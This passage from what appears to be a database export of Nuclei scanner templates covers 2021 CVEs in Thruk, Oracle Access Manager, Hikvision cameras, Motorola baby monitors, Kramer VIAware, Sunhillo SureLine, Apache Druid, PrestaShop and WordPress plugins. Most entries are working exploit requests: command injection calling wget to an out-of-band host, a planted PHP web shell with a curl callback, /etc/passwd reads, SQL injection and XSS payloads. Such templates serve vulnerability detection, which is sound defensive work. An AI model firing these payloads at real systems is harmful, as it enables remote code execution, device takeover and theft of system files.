attacker can inject arbitrary JavaScript into status.cgi, leading to a triggered payload when accessed by an authenticated user.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of Thruk or apply the vendor-supplied patch to mitigate this vulnerability.\n reference:\n - https://www.gruppotim.it/redteam\n - https://www.thruk.org/changelog.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-35488\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-35488\n cwe-id: CWE-79\n epss-score: 0.00145\n epss-percentile: 0.49429\n cpe: cpe:2.3:a:thruk:thruk:2.40-2:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: thruk\n product: thruk\n shodan-query: http.html:\"Thruk\"\n tags: cve2021,cve,thruk,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/thruk/cgi-bin/login.cgi?thruk/cgi-bin/status.cgi%3fstyle=combined&title=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"'>\"\n - \"Thruk Monitoring\"\n condition: and\n\n - type: status\n status:\n - 401\n# digest: 4a0a00473045022055819e8cdb5dcdc004233f8a173514f660c7708e98c66aa9920871ec2ca70969022100a7fabd08928656f2dce44bc87916e1e6d23fbe29309f0dff542373be9cf5b065:922c64590222798bb761d5b6d8e72950", "hash": "b6720e3c0421f9ebc080db0efc8b1ab0", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30837c" }, "name": "CVE-2021-35587.yaml", "content": "id: CVE-2021-35587\n\ninfo:\n name: Oracle Access Manager - Remote Code Execution\n author: cckuailong\n severity: critical\n description: |\n The Oracle Access Manager portion of Oracle Fusion Middleware (component: OpenSSO Agent) is vulnerable to remote code execution. Supported versions that are affected are 11.1.2.3.0, 12.2.1.3.0 and 12.2.1.4.0. This is an easily exploitable vulnerability that allows unauthenticated attackers with network access via HTTP to compromise Oracle Access Manager.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches provided by Oracle to mitigate this vulnerability.\n reference:\n - https://testbnull.medium.com/oracle-access-manager-pre-auth-rce-cve-2021-35587-analysis-1302a4542316\n - https://nvd.nist.gov/vuln/detail/CVE-2021-35587\n - https://www.oracle.com/security-alerts/cpujan2022.html\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-35587\n cwe-id: CWE-502\n epss-score: 0.95643\n epss-percentile: 0.99283\n cpe: cpe:2.3:a:oracle:access_manager:11.1.2.3.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: oracle\n product: access_manager\n shodan-query: http.title:\"Oracle Access Management\"\n fofa-query: body=\"/oam/pages/css/login_page.css\"\n tags: cve2021,cve,oam,rce,java,unauth,oracle,kev\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/oam/server/opensso/sessionservice'\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"x-oracle-dms-ecid\"\n - \"x-oracle-dms-rid\"\n case-insensitive: true\n condition: or\n\n - type: word\n part: body\n words:\n - \"/oam/pages/css/general.css\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402203fa7de8fecbc2facc8c0a655b8b2cc61275326363d9fff38647fca243359d02f02202382cce3edd69ce78ac95cf891de98a149c0998b0d05ba805cd0fab8e0113e48:922c64590222798bb761d5b6d8e72950", "hash": "92726b48da5fbdec1f65bdbeef356dd6", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30837d" }, "name": "CVE-2021-3577.yaml", "content": "id: CVE-2021-3577\n\ninfo:\n name: Motorola Baby Monitors - Remote Command Execution\n author: gy741\n severity: high\n description: Motorola Baby Monitors contains multiple interface vulnerabilities could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected device, potentially leading to unauthorized access, data theft, or further compromise of the network.\n remediation: |\n Apply the latest firmware update provided by Motorola to mitigate the vulnerability and ensure the device is not accessible from untrusted networks.\n reference:\n - https://randywestergren.com/unauthenticated-remote-code-execution-in-motorola-baby-monitors/\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3577\n - https://binatoneglobal.com/security-advisory/\n classification:\n cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2021-3577\n cwe-id: CWE-863,CWE-78\n epss-score: 0.96689\n epss-percentile: 0.99568\n cpe: cpe:2.3:o:binatoneglobal:halo\\+_camera_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: binatoneglobal\n product: halo\\+_camera_firmware\n tags: cve2021,cve,rce,oast,motorola,iot,binatoneglobal\n\nhttp:\n - raw:\n - |\n GET /?action=command&command=set_city_timezone&value=$(wget%20http://{{interactsh-url}})) HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n - type: word\n words:\n - \"set_city_timezone\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100aa647d7278be70f7ef65a356025ae3d22e20cc5aebb94c19af995eda0891d7270220009f787b78b8aba27783ce6d989d860f42d0dc1c269988692807dfe6fffaba3e:922c64590222798bb761d5b6d8e72950", "hash": "5fe1145e36e4fac0a5c5acebba1a5058", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30837e" }, "name": "CVE-2021-36260.yaml", "content": "id: CVE-2021-36260\n\ninfo:\n name: Hikvision IP camera/NVR - Remote Command Execution\n author: pdteam,gy741,johnk3r\n severity: critical\n description: Certain Hikvision products contain a command injection vulnerability in the web server due to the insufficient input validation. An attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the affected device.\n remediation: |\n Apply the latest firmware update provided by Hikvision to mitigate this vulnerability.\n reference:\n - https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html\n - https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-36260\n - https://github.com/Aiminsun/CVE-2021-36260\n - https://therecord.media/experts-warn-of-widespread-exploitation-involving-hikvision-cameras/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-36260\n cwe-id: CWE-78\n epss-score: 0.97484\n epss-percentile: 0.99965\n cpe: cpe:2.3:o:hikvision:ds-2cd2026g2-iu\\/sl_firmware:-:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: hikvision\n product: ds-2cd2026g2-iu\\/sl_firmware\n shodan-query: http.favicon.hash:999357577\n tags: cve2021,cve,hikvision,rce,iot,intrusive,kev\n\nhttp:\n - raw:\n - |\n PUT /SDK/webLanguage HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n $(cat /etc/passwd>webLib/x)\n - |\n GET /x HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n# digest: 4a0a0047304502201b310c74c0ecade6660855e689efe3fa564362a2328cdf4ee738863363e0b7c7022100b519bac287cc3e8a6a3cd1187daf969b5f5baf0a2ec9be7adb3344e95561dfc2:922c64590222798bb761d5b6d8e72950", "hash": "af46113b57790c468517b9e81872cf91", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30837f" }, "name": "CVE-2021-36356.yaml", "content": "id: CVE-2021-36356\n\ninfo:\n name: Kramer VIAware - Remote Code Execution\n author: gy741\n severity: critical\n description: KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable pathnames.\n remediation: |\n Apply the latest firmware update provided by Kramer to fix the vulnerability and ensure proper input validation in the web interface.\n reference:\n - https://www.exploit-db.com/exploits/50856\n - https://nvd.nist.gov/vuln/detail/CVE-2021-36356\n - https://nvd.nist.gov/vuln/detail/CVE-2021-35064\n - https://write-up.github.io/kramerav/\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-36356\n cwe-id: CWE-434\n epss-score: 0.90558\n epss-percentile: 0.98752\n cpe: cpe:2.3:a:kramerav:viaware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: kramerav\n product: viaware\n tags: cve2021,cve,viaware,kramer,edb,rce,intrusive,kramerav\nvariables:\n useragent: \"{{rand_base(6)}}\"\n\nhttp:\n - raw:\n - |\n POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n radioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php\n - |\n GET /{{randstr}}.php?cmd=sudo+rpm+--eval+'%25{lua%3aos.execute(\"curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'\")}' HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - http\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: {{useragent}}\"\n# digest: 490a0046304402207d315039be7b2374857658abe5c9080339493506959d103b741bd2b02930cb020220187d49b26985f25c39c9ba0317f1b0bf0540895f0ee8e3b35b33f10f2b8e4c86:922c64590222798bb761d5b6d8e72950", "hash": "b7e4ecc4985dfe3eba785cf71c1eae1a", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308380" }, "name": "CVE-2021-36380.yaml", "content": "id: CVE-2021-36380\n\ninfo:\n name: Sunhillo SureLine <8.7.0.1.1 - Unauthenticated OS Command Injection\n author: gy741\n severity: critical\n description: Sunhillo SureLine <8.7.0.1.1 is vulnerable to OS command injection. The /cgi/networkDiag.cgi script directly incorporated user-controllable parameters within a shell command, allowing an attacker to manipulate the resulting command by injecting valid OS command input. The following POST request injects a new command that instructs the server to establish a reverse TCP connection to another system, allowing the establishment of an interactive remote shell session.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.\n remediation: |\n Upgrade to Sunhillo SureLine version 8.7.0.1.1 or later to mitigate this vulnerability.\n reference:\n - https://research.nccgroup.com/2021/07/26/technical-advisory-sunhillo-sureline-unauthenticated-os-command-injection-cve-2021-36380/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-36380\n - https://www.sunhillo.com/product/sureline/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-36380\n cwe-id: CWE-78\n epss-score: 0.97166\n epss-percentile: 0.99767\n cpe: cpe:2.3:a:sunhillo:sureline:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: sunhillo\n product: sureline\n tags: cve2021,cve,sureline,rce,oast,sunhillo\n\nhttp:\n - raw:\n - |\n POST /cgi/networkDiag.cgi HTTP/1.1\n Host: {{Hostname}}\n\n command=2&ipAddr=&dnsAddr=$(wget+http://{{interactsh-url}})&interface=0&netType=0&scrFilter=&dstFilter=&fileSave=false&pcapSave=false&fileSize=\n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n# digest: 4a0a00473045022100cb869fc390807661722089db3f26b28a3794a43b3cca905e55d84e61c0a69225022067c488943ca79fef10f100fa0e96c1d2ce819ff67af0b598c2d92ca30be6b3c2:922c64590222798bb761d5b6d8e72950", "hash": "11ae670a573fc1994e2ae75924b399f0", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308381" }, "name": "CVE-2021-36450.yaml", "content": "id: CVE-2021-36450\n\ninfo:\n name: Verint Workforce Optimization 15.2.8.10048 - Cross-Site Scripting\n author: atomiczsec\n severity: medium\n description: Verint Workforce Optimization 15.2.8.10048 contains a cross-site scripting vulnerability via the control/my_notifications NEWUINAV parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patch or upgrade to a non-vulnerable version of Verint Workforce Optimization.\n reference:\n - https://medium.com/@1nf0sk/cve-2021-36450-cross-site-scripting-xss-6f5d8d7db740\n - https://sushantvkamble.blogspot.com/2021/11/cross-site-scripting-xss.html\n - http://verint.com\n - https://nvd.nist.gov/vuln/detail/CVE-2021-36450\n - https://medium.com/%401nf0sk/cve-2021-36450-cross-site-scripting-xss-6f5d8d7db740\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-36450\n cwe-id: CWE-79\n epss-score: 0.00229\n epss-percentile: 0.61111\n cpe: cpe:2.3:a:verint:workforce_optimization:15.2.8.10048:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: verint\n product: workforce_optimization\n shodan-query: title:\"Verint Sign-in\"\n tags: cve2021,cve,xss,verint\n\nhttp:\n - raw:\n - |\n GET /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n browserCheckEnabled=true&username=admin&language=en_US&defaultHttpPort=80&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login&csrfp_login={{csrfp_login}}\n\n host-redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\">

    Test

    26\" class=\"loginUserNameText'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: csrfp_login\n group: 1\n regex:\n - 'csrfp_login=([a-zA-Z0-9]+);'\n internal: true\n part: header\n# digest: 490a0046304402204bbeed6302fbd74c4981446c4aec420dbd5e6b911f5f7a14f3e8b4d768c306fb02203c509944c3d418204a9b643c3a66e02ed59a5d53806b11c6c38444b56c217f79:922c64590222798bb761d5b6d8e72950", "hash": "f1e221c4efa572bd72a2594ab9e6e042", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308382" }, "name": "CVE-2021-3654.yaml", "content": "id: CVE-2021-3654\n\ninfo:\n name: Nova noVNC - Open Redirect\n author: geeknik\n severity: medium\n description: Nova noVNC contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the open redirect vulnerability in the Nova noVNC application.\n reference:\n - https://seclists.org/oss-sec/2021/q3/188\n - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3654\n - https://bugs.python.org/issue32084\n - https://opendev.org/openstack/nova/commit/04d48527b62a35d912f93bc75613a6cca606df66\n - https://nvd.nist.gov/vuln/detail/CVE-2021-3654\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-3654\n cwe-id: CWE-601\n epss-score: 0.92596\n epss-percentile: 0.98944\n cpe: cpe:2.3:a:openstack:nova:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: openstack\n product: nova\n tags: cve2021,cve,redirect,novnc,seclists,openstack\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}//interact.sh/%2f..'\n\n matchers-condition: and\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$'\n\n - type: status\n status:\n - 302\n - 301\n# digest: 4a0a00473045022038b9f6ddbb2bec14ec5183894095d1bb6407357f4b3884a6cd3968caf9b2ff4d022100dec5cef15816ab428fbc7a300123ad1d5f0e8bb046107d7f0d4f5d869b16d70c:922c64590222798bb761d5b6d8e72950", "hash": "0305dcb6144c9224e1128054a0e712f0", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308383" }, "name": "CVE-2021-36580.yaml", "content": "id: CVE-2021-36580\n\ninfo:\n name: IceWarp Mail Server - Open Redirect\n author: DhiyaneshDk\n severity: medium\n description: |\n IceWarp Mail Server contains an open redirect via the referer parameter. This can lead to phishing attacks or other unintended redirects.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by IceWarp to fix the open redirect vulnerability.\n reference:\n - https://www.icewarp.com/\n - https://twitter.com/shifacyclewala/status/1443298941311668227\n - http://icewarp.com\n - http://mail.ziyan.com\n - https://medium.com/%40rohitgautam26/cve-2021-36580-69219798231c\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-36580\n cwe-id: CWE-601\n epss-score: 0.00233\n epss-percentile: 0.60652\n cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: icewarp\n product: icewarp_server\n shodan-query: title:\"icewarp\"\n tags: cve2021,cve,icewarp,redirect\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/webmail/basic/?referer=https://interact.sh&_c=auth&ctz=120&signup_password=&_a%5bsignup%5d=1\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 4a0a0047304502201fb7d9f7f3b4cc99c307df40e242a485cec4ec2e1825cb4321b536061d94e5200221009cde712c4679e05357975cbc11bd9caaabcc6fe2ecf21d3d796c06da80f6ed32:922c64590222798bb761d5b6d8e72950", "hash": "b8bf76fa5db5765b5dbe4b393c39197f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308384" }, "name": "CVE-2021-36748.yaml", "content": "id: CVE-2021-36748\n\ninfo:\n name: PrestaHome Blog for PrestaShop <1.7.8 - SQL Injection\n author: whoever\n severity: high\n description: PrestaHome Blog for PrestaShop prior to version 1.7.8 is vulnerable to a SQL injection (blind) via the sb_category parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.\n remediation: |\n Upgrade to PrestaShop version 1.7.8 or later, or apply the provided patch to fix the SQL Injection vulnerability.\n reference:\n - https://blog.sorcery.ie/posts/ph_simpleblog_sqli/\n - https://alysum5.promokit.eu/promokit/documentation/blog/\n - https://blog.sorcery.ie\n - https://nvd.nist.gov/vuln/detail/CVE-2021-36748\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-36748\n cwe-id: CWE-89\n epss-score: 0.0061\n epss-percentile: 0.78175\n cpe: cpe:2.3:a:prestahome:blog:*:*:*:*:*:prestashop:*:*\n metadata:\n max-request: 2\n vendor: prestahome\n product: blog\n framework: prestashop\n tags: cve2021,cve,prestashop,prestahome,sqli,cms\n\nhttp:\n - raw:\n - |\n GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - \"status_code_1 == 200\"\n - \"status_code_2 == 404\"\n - 'contains(body_1, \"prestashop\")'\n - \"contains(tolower(header_2), 'index.php?controller=404')\"\n - \"len(body_2) == 0\"\n condition: and\n# digest: 4a0a0047304502210086d824280f02e57da9f8e8dd279b769c0c8778ae15184ca95fba4f7d921ade7502206b3eb93275afcda1d68912cda1e9e9df0f2cf41e0153060af346b8e123a8b337:922c64590222798bb761d5b6d8e72950", "hash": "8b548460feb8a317703b902b7bfed839", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308385" }, "name": "CVE-2021-36749.yaml", "content": "id: CVE-2021-36749\n\ninfo:\n name: Apache Druid - Local File Inclusion\n author: _0xf4n9x_\n severity: medium\n description: Apache Druid ingestion system is vulnerable to local file inclusion. The InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the affected system.\n remediation: |\n Apply the latest security patches or updates provided by Apache Druid to fix the LFI vulnerability.\n reference:\n - https://github.com/BrucessKING/CVE-2021-36749\n - https://lists.apache.org/thread.html/rc9400a70d0ec5cdb8a3486fc5ddb0b5282961c0b63e764abfbcb9f5d%40%3Cdev.druid.apache.org%3E\n - https://nvd.nist.gov/vuln/detail/CVE-2021-36749\n - https://lists.apache.org/thread.html/r304dfe56a5dfe1b2d9166b24d2c74ad1c6730338b20aef77a00ed2be@%3Cannounce.apache.org%3E\n - https://lists.apache.org/thread.html/r304dfe56a5dfe1b2d9166b24d2c74ad1c6730338b20aef77a00ed2be%40%3Cannounce.apache.org%3E\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2021-36749\n cwe-id: CWE-863\n epss-score: 0.79504\n epss-percentile: 0.98204\n cpe: cpe:2.3:a:apache:druid:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: druid\n tags: cve2021,cve,apache,lfi,auth-bypass,druid\n\nhttp:\n - raw:\n - |\n POST /druid/indexer/v1/sampler?for=connect HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n {\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"firehose\":{\"type\":\"http\",\"uris\":[\" file:///etc/passwd \"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"parser\":{\"type\":\"string\", \"parseSpec\":{\"format\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"a\"],\"dimensionsSpec\":{},\"timestampSpec\":{\"column\":\"no_ such_ column\",\"missingValue\":\"2010-01-01T00:00:00Z\"}}}}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n - \"druid:*:1000:1000:\"\n condition: or\n# digest: 4a0a0047304502203323830c1d350362a1c5cd6246f4f62a3e158e16610ad18f3ebcb1d4d11ed22a022100896e444f11e41d53616e890391efd077dee3d68ac3fa1b00958001f56c6696e7:922c64590222798bb761d5b6d8e72950", "hash": "462854f7bf8bc463fac205b39dd9a030", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308386" }, "name": "CVE-2021-36873.yaml", "content": "id: CVE-2021-36873\n\ninfo:\n name: WordPress iQ Block Country <=1.2.11 - Cross-Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n WordPress iQ Block Country plugin 1.2.11 and prior contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n remediation: |\n Update to the latest version of the WordPress iQ Block Country plugin (>=1.2.12) to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/ba93f085-2153-439b-9cda-7c5b09d3ed58\n - https://wordpress.org/plugins/iq-block-country/\n - https://patchstack.com/database/vulnerability/iq-block-country-/wordpress-iq-block-country-plugin-1-2-11-authenticated-persistent-cross-site-scripting-xss-vulnerability\n - https://nvd.nist.gov/vuln/detail/CVE-2021-36873\n - https://wordpress.org/plugins/iq-block-country/#developers\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2021-36873\n cwe-id: CWE-79\n epss-score: 0.00131\n epss-percentile: 0.47179\n cpe: cpe:2.3:a:webence:iq_block_country:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: webence\n product: iq_block_country\n framework: wordpress\n tags: cve,cve2021,wp-plugin,iq-block-country,wordpress,wp,xss,authenticated,wpscan,webence\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/options-general.php?page=iq-block-country%2Flibs%2Fblockcountry-settings.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /wp-admin/options.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n option_page=iqblockcountry-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Diq-block-country%2Flibs%2Fblockcountry-settings.php&blockcountry_blockmessage=test&blockcountry_redirect=2&blockcountry_redirect_url=&blockcountry_header=on&blockcountry_nrstatistics=15&blockcountry_daysstatistics=30&blockcountry_geoapikey=&blockcountry_apikey=&blockcountry_ipoverride=NONE&blockcountry_debuglogging=on\n - |\n GET /wp-admin/options-general.php?page=iq-block-country%2Flibs%2Fblockcountry-settings.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - contains(header_4, \"text/html\")\n - status_code_4 == 200\n - contains(body_4, 'blockcountry_blockmessage\\\">test')\n - contains(body_4, '

    Block type

    ')\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 'name=\"_wpnonce\" value=\"([0-9a-zA-Z]+)\"'\n internal: true\n# digest: 490a004630440220684766e6e255bb9e4afa32a94b1ca2dc955141bb09fed41190b572538a9c5c2d02201338c2a3689ac3cc0f55a9edc41183f9d05cac1325b267cd51aa3d1c282ea228:922c64590222798bb761d5b6d8e72950", "hash": "cd79ac864b9cd9acd3fc73f5bc16cf5f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308387" }, "name": "CVE-2021-37216.yaml", "content": "id: CVE-2021-37216\n\ninfo:\n name: QSAN Storage Manager <3.3.3 - Cross-Site Scripting\n author: dwisiswant0\n severity: medium\n description: |\n QSAN Storage Manager before 3.3.3 contains a reflected cross-site scripting vulnerability. Header page parameters do not filter special characters. Remote attackers can inject JavaScript to access and modify specific data.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade QSAN Storage Manager to version 3.3.3 or later to mitigate this vulnerability.\n reference:\n - https://www.twcert.org.tw/tw/cp-132-4962-44cd2-1.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-37216\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-37216\n cwe-id: CWE-79\n epss-score: 0.00108\n epss-percentile: 0.42604\n cpe: 